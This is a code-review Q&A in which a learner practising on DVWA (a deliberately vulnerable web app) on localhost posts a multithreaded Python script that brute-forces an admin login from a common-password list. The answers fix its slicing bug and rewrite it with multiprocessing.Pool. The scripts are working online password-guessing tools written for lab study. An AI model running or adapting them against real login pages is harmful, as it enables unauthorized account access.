# Multithreaded password cracker

Tags: python, python-3.x, multithreading, security

I am learning infosec with DVWA (Damn Vulnerable Web Application). At first I've decided to write something to brute force admin login screen. I've downlaoded a list of most commonly used passwords and created a script which takes them and attempts to log in. What do you think of it, what could be improved?

```
#!/usr/bin/env python3

import threading
import requests

URL = 'http://localhost/login.php'
PASSWORD_FILE_NAME = 'common-passwords.txt'
entry_found = False


def create_threads(passwords):
    password_list_split_points = [
        (0, len(passwords) // 4),
        (len(passwords) // 4 + 1, len(passwords) // 2),
        (len(passwords) // 2 + 1, 3 * (len(passwords) // 4)),
        (3 * (len(passwords) // 4) + 1, len(passwords) - 1),
    ]
    thread_list = [threading.Thread(
        target=run_cracker,
        args=(
            passwords[split_point[0] : split_point[1]]
        )
    ) for split_point in password_list_split_points]
    return thread_list


def run_cracker(*passwords):
    global entry_found
    for password in passwords:
        if entry_found:
            break
        # Passwords still contain last \n char which has to be stripped.
        if crack_password(password.rstrip()):
            # This is set to True only once. No need for sync mechanisms.
            entry_found = True


def crack_password(password):
    print('[*] Trying password: "{}" ...'.format(password))
    response = requests.post(
        URL,
        data={'username': 'admin', 'Login': 'Login', 'password': password}
    )

    if bytes('Login failed', encoding='utf-8') not in response.content:
        print('[*] Login successful for username: {} password: {}'.format(
            'admin', password
        ))
        return True
    else:
        return False


if __name__ == '__main__':
    with open(PASSWORD_FILE_NAME) as password_file:
        passwords = password_file.readlines()

    thread_list = create_threads(passwords)

    for thread in thread_list:
        print('[*] Running thread: {}.'.format(thread.getName()))
        thread.start()

    for thread in thread_list:
        print('[*] Wating for {} to join.'.format(thread.getName()))
        thread.join()
```

Comment: I assume this isn't intended for actual cracking. If so, python is not a great language for such a problem, given the speed.

Comment: It's been used in creating some exploits and there are other bottlenecks than the language itself like network speed od server response speed. I am not using GPU hash cracking but simple bruteforce against (intendently) poorly designed web app. Metasploit is also based on scripting language (ruby). I think I'll compare it with some java, swift or C++ in some time, but currently it serves it purpose well enough :-)

Answer (score 0, accepted):

**Recommendations**

- Right now the `create_threads` function is skipping passwords and is hard-coded to only work with four threads. I'll go over ways to fix both of these issues.
- The password skipping occurs because taking a slice of a Python `list` is a non-inclusive operation.

For example:

```
n = 100
a = range(n)
b = a[0 : n // 4]          # equals [0, 1, ... , 23, 24]
c = a[n // 4 + 1 : n // 2] # equals [26, 27, ..., 47, 48]
```

- Notice that `a[25]` is being skipped. You can fix this by slicing `a` in the following way: `[a[i : i + n // 4] for i in range(0, n, n // 4)]`
- The problem is that this solution assumes that `n % 4 == 0`. Or, to bring it back to your code, that `len(passwords) % 4 == 0`. In the code below we can fix this issue by keeping track of the value of the modulus operation in the variable `m`. If `m != 0` then we can replace the last list (in our list of password slices, `xs`) with the appropriate slice.
- Fortunately all of this makes it easier to replace the hard-coded thread number with a variable (`t` in the code below).

**Code**

```
def create_threads(t, passwords):
    n = len(passwords)
    x = n // t
    m = n % t 
    xs = [passwords[i:i+x] for i in range(0, n, x)]
    if m:
        xs[t-1:] = [passwords[-m-x:]]
    assert(sum([len(l) for l in xs]) == n)
    return [
        threading.Thread(target=run_cracker, args=(l)) for l in xs
    ]
```

Answer (score 2):

This seems to me like your `create_threads` and `run_cracker` functions are trying to reinvent something that look like [`multiprocessing.Pool`](https://docs.python.org/3/library/multiprocessing.html#multiprocessing.pool.Pool)s. Using them, you just need to implement `crack_password`, managing the workload and spawning processes will be done by the pool.

This will however not short-circuit once a working password has been found.

Example implementation:

```
from multiprocessing import Pool

import requests


def crack_password(password, url='http://localhost/login.php'):
    response = requests.post(
        url,
        data={'username': 'admin', 'Login': 'Login', 'password': password}
    )

    if bytes('Login failed', encoding='utf-8') not in response.content:
        return password


def main(passwords_filename='common-passwords.txt'):
    with open(passwords_filename) as passwords_file:
        passwords = passwords_file.readlines()

    with Pool(4) as pool:
        results = pool.map(crack_password, passwords)
        success = list(filter(None, results))
    print(success)


if __name__ == '__main__':
    main()
```

Comment: Yeah. I always forget that python programming is almost like "import program; program.run()". I should have made a more careful reaserch.